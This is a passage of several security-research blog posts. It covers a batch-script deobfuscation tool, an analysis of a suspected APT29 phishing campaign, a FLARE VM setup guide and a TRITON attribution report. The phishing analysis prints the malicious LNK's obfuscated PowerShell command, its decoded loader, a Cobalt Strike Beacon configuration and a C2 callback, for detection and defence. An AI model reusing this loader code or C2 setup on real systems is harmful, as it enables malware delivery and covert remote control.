Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and executable programs, so unlike breaking on CreateProcess, it will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and its location varies per system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves this function’s offset using Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset. You can then supply that output as the argument to the --useoff switch in your offline machine to inform De-DOSfuscator where the function is located. Alternately, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows De-DOSfuscator log after inducing the rest of the code to run.


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse having only one cross-reference that seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible anywhere else in the code, it controls whether a function is called to dump information about the command that has been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands, because it dumps the tree in preorder traversal rather than inorder like it was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering historical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.].com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d), contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

Time

Event

Source

2018-10-15 15:35:19Z

pandorasong[.]com registered

Registrant Information

2018-10-15 17:39:00Z

pandorasong[.]com SSL certificate established

Certificate Transparency

2018-10-15 18:52:06Z

Cobalt Strike server established

Scan Data

2018-11-02 10:25:58Z

LNK Weaponized

LNK Metadata

2018-11-13 17:58:41Z

3fccf531ff0ae6fedd7c586774b17a2d modified

Archive Metadata

2018-11-14 01:48:34Z

658c6fe38f95995fa8dc8f6cfe41df7b modified

Archive Metadata

2018-11-14 08:23:10Z

First observed phishing e-mail sent

Telemetry

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64.

The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb="ds7002.lnk";
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
   exit
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON loader DLL is executed with the export function "PointFunctionCall":

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF") Invoke-Item
$((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat") if
($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",")
$("PointFunctionCall") }

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %APPDATA%\Local\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation/initialization of the malware, it made the following callback to the C2 server pandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile. The profile may have been changed to bypass common detections for the publicly available malleable profiles. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong.com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

Indicator

Description

dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36
928202aa46271691a8255aaa15382822aa25821925a
0245@northshorehealthgm[.]org

Phishing email address from likely compromised legitimate server

Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you

Phishing email subject

https://www.jmj[.]com/personal/nauerthn_state_gov/*

Malware hosting location on likely compromised legitimate domain

pandorasong[.]com

BEACON C2

95.216.59[.]92

Resolution of pandorasong[.]com

2b13b244aafe1ecace61ea1119a1b2ee

SSL certificate for pandorasong[.]com

3fccf531ff0ae6fedd7c586774b17a2d

Malicious ZIP archive MD5

658c6fe38f95995fa8dc8f6cfe41df7b

Benign ZIP archive MD5

6ed0020b0851fb71d5b0076f4ee95f3c

Malicious LNK file MD5

313f4808aa2a2073005d219bc68971cd

Benign decoy PDF MD5

16bbc967a8b6a365871a05c74a4f345b

BEACON DLL MD5

%APPDATA%\Local\cyzfc.dat

BEACON DLL file path

%TEMP%\ds7002.PDF

Benign decoy PDF file path

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

Product

Detection names

Network Security

Malware.Archive
Malware.Binary.lnk
Suspicious.Backdoor.Beacon

Endpoint Security

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Generic.mg.16bbc967a8b6a365

Threat Analytics Platform

WINDOWS METHODOLOGY [PowerShell Base64 String]
WINDOWS METHODOLOGY [Rundll32 Roaming]
WINDOWS METHODOLOGY [PowerShell Script Block Warning]
WINDOWS METHODOLOGY [Base64 Char Args]
TADPOLE DOWNLOADER [Rundll Args]
INTEL HIT - IP [Structured Threat Reputation-Based]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]
INTEL HIT - FILE HASH [Structured Threat Reputation-Based]

Table 3: FireEye product detections

FLARE VM Update

FLARE VM is the first of its kind reverse engineering and malware analysis distribution on Windows platform. Since its introduction in July 2017, FLARE VM has been continuously trusted and used by many reverse engineers, malware analysts, and security researchers as their go-to environment for analyzing malware. Just like the ever-evolving security industry, FLARE VM has gone through many major changes to better support our users’ needs. FLARE VM now has a new installation, upgrade, and uninstallation process, which is a long anticipated feature requested by our users. FLARE VM also includes many new tools such as IDA 7.0, radare and YARA. Therefore, we would like to share these updates, especially the new installation process.

Installation

We strongly recommend you use FLARE VM within a virtualized environment for malware analysis to protect and isolate your physical device and network from malicious activities. We assume you already have experience setting up and configuring your own virtualized environment. Please create a new virtual machine (VM) and perform a fresh installation of Windows. FLARE VM is designed to be installed on Windows 7 Service Pack 1 or newer; therefore, you can select a version of windows that best suits your needs. From this point forward, all installation steps should be performed within your VM.

Once you have a VM with a fresh installation of Windows, use one of the following URLs to download the compressed FLARE VM repository onto your VM:

  • https://github.com/fireeye/flare-vm
  • https://flarevm.info


Figure 1: Download FLARE VM repo

Then, use the following steps to install FLARE VM:

  1. Decompress the FLARE VM repository to a directory of your choosing.
  2. Start a new session of PowerShell with escalated privileges. FLARE VM attempts to install additional software and modify system settings; therefore, escalated privileges are required for installation.
  3. Within PowerShell, change directory to the location where you have decompressed the FLARE VM repository.
  4. Enable unrestricted execution policy for PowerShell by executing the following command and answering “Y” when prompted by PowerShell: Set-ExecutionPolicy unrestricted
  5. Execute the install.ps1 installation script. You will be prompted to enter the current user’s password. FLARE VM needs the current user’s password to automatically login after a reboot when installing. Optionally, you can specify the current user’s password by passing the “-password <current_user_password>” at the command line.


Figure 2: Start PowerShell as administrator


Figure 3: Ready to install FLARE VM

The rest of the installation process is fully automated. Depending upon your internet speed the entire installation may take up to one hour to finish. The VM also reboots multiple times due to the numerous software installations’ requirements. Once the installation completes, the PowerShell prompt remains open waiting for you to hit any key before exiting. After completing the installation, you will be presented with the following desktop environment:


Figure 4: FLARE VM installation completes

Congratulations! You have successfully installed FLARE VM. At this point we recommend you power off the VM, switch the VM networking mode to Host-Only, and then take a snapshot to save a clean state of your analysis VM.

Improvement

The biggest improvement for FLARE VM is the ability to perform a proper update and uninstallation. The older version of FLARE VM came as a PowerShell script to install many chocolatey packages, one at a time; therefore, we were unable to include new packages when updating FLARE VM. In the past, our users had to reinstall FLARE VM completely, which is time consuming, or manually install the new package, which is error prone. To solve this issue, we have converted FLARE VM itself into a chocolatey package. Whenever a new tool is available we will also release a new version of FLARE VM. With this new design we can simply execute “choco upgrade all” to get the newest version of FLARE VM along with any new packages we have released. You can also safely uninstall all FLARE VM packages by executing “choco uninstall flarevm.installer.flare”.

Our new FLARE VM is also updated to use Python 3.7 as the default Python interpreter. As a result, many python scripts may fail to execute. To maintain support for older scripts, we keep Python 2.7 installed in parallel with Python 3.7. We can easily switch between different versions by using the Python launcher. Run “py -2.7 <path_to_python_script>” to use Python 2.7, or “py <path_to_python_script>” to use the default Python 3.7 interpreter. For more details on the Python launcher, please refer to the following URL: https://docs.python.org/3/using/windows.html#launcher.

Additionally, the new FLARE VM changes the location where Fakenet-NG saves its output when launched via the shortcut in the FLARE folder or taskbar pin. Instead of saving directly to the desktop, to reduce clutter, Fakenet-NG will store all its output in “Desktop\fakenet_logs”.

Compared to older versions this version of FLARE VM comes with many new tools and software packages. Most notably, this release adds the following:

  • IDA Free 7.0
  • radare2 to support 64-bit disassembly
  • The labs for the Practical Malware Analysis book
  • pdfid, pdf-parser, and PdfStreamdumper to analyze malicious PDF documents
  • The Malcode Analyst Pack
  • Yara for signature matching
  • The Cygwin Linux environment on windows
  • PowerShell transcription and script block logging
    • PowerShell transcripts can be found in “Desktop\PS_Transcripts”

Available Packages

While we attempt to make the tools available as shortcuts within the FLARE folder, there are several available from command-line only. Please see the online documentation for the most up to date list. Here is an incomplete list of some major tools available on FLARE VM:

  • Disassemblers:
    • IDA Free 5.0 and IDA Free 7.0
    • Binary Ninja
    • Radare2 and Cutter
  • Debuggers:
    • OllyDbg and OllyDbg2
    • x64dbg
    • Windbg
  • File Format parser:
    • CFF Explorer, PEView, PEStudio
    • PdfStreamdumper, pdf-parser, pdfid
    • ffdec
    • offvis and officemalscanner
    • PE-bear
  • Decompilers:
    • RetDec
    • Jd-gui and bytecode-viewer
    • dnSpy
    • IDR
    • VBDecompiler
    • Py2ExeDecompiler
  • Monitoring tools:
    • SysInternal suite
    • RegShot
  • Utilities:
    • Hex Editors (010 editor, HxD and File Insight)
    • FLOSS (FireEye Labs Obfuscated String Solver)
    • Fakenet-NG
    • Yara
    • Malware Analyst Pack

Conclusion

The FLARE team continues to support and improve FLARE VM to be the de facto distribution for security research, incident response, and malware analysis on Windows platform. We greatly appreciate the numerous bug reports, tool requests, and feature recommendations from everyone. We hope FLARE VM, along with many other FLARE open source projects, can help you do your work better, easier, and faster.

We are always looking for talented folks to join our team. The FLARE Team may be a good place for you if:

  • You eat, sleep, and speak disassembly and malware all day long.
  • You would like to push the state of the art for reverse engineering and malware analysis.

Please check out our careers page, or send us an email. Happy Reversing!

TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers

Overview

In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility. We now track this activity set as TEMP.Veles. In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute.

TRITON Intrusion Demonstrates Russian Links; Likely Backed by Russian Research Institute

FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post. We present as much public information as possible to support this assessment, but withheld sensitive information that further contributes to our high confidence assessment.

  1. FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
  2. Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
  3. An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
  4. Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
  5. We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.

While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer’s approval, the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute.

Detail

Malware Testing Activity Suggests Links between TEMP.Veles and CNIIHM

During our investigation of TEMP.Veles activity, we found multiple unique tools that the group deployed in the target environment. Some of these same tools, identified by hash, were evaluated in a malware testing environment by a single user.

Malware Testing Environment Tied to TEMP.Veles

We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools.

  • At times, the use of this malware testing environment correlates to in-network activities of TEMP.Veles, demonstrating direct operational support for intrusion activity.
    • Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment.
    • TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Soon after, the customized utility was again evaluated in the malware testing environment. The following day, TEMP.Veles again tried the utility on a compromised system.
  • The user has been active in the malware testing environment since at least 2013, testing customized versions of multiple open-source frameworks, including Metasploit, Cobalt Strike, PowerSploit, and other projects. The user’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques.
  • Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software, retrofitted with code used for command and control.

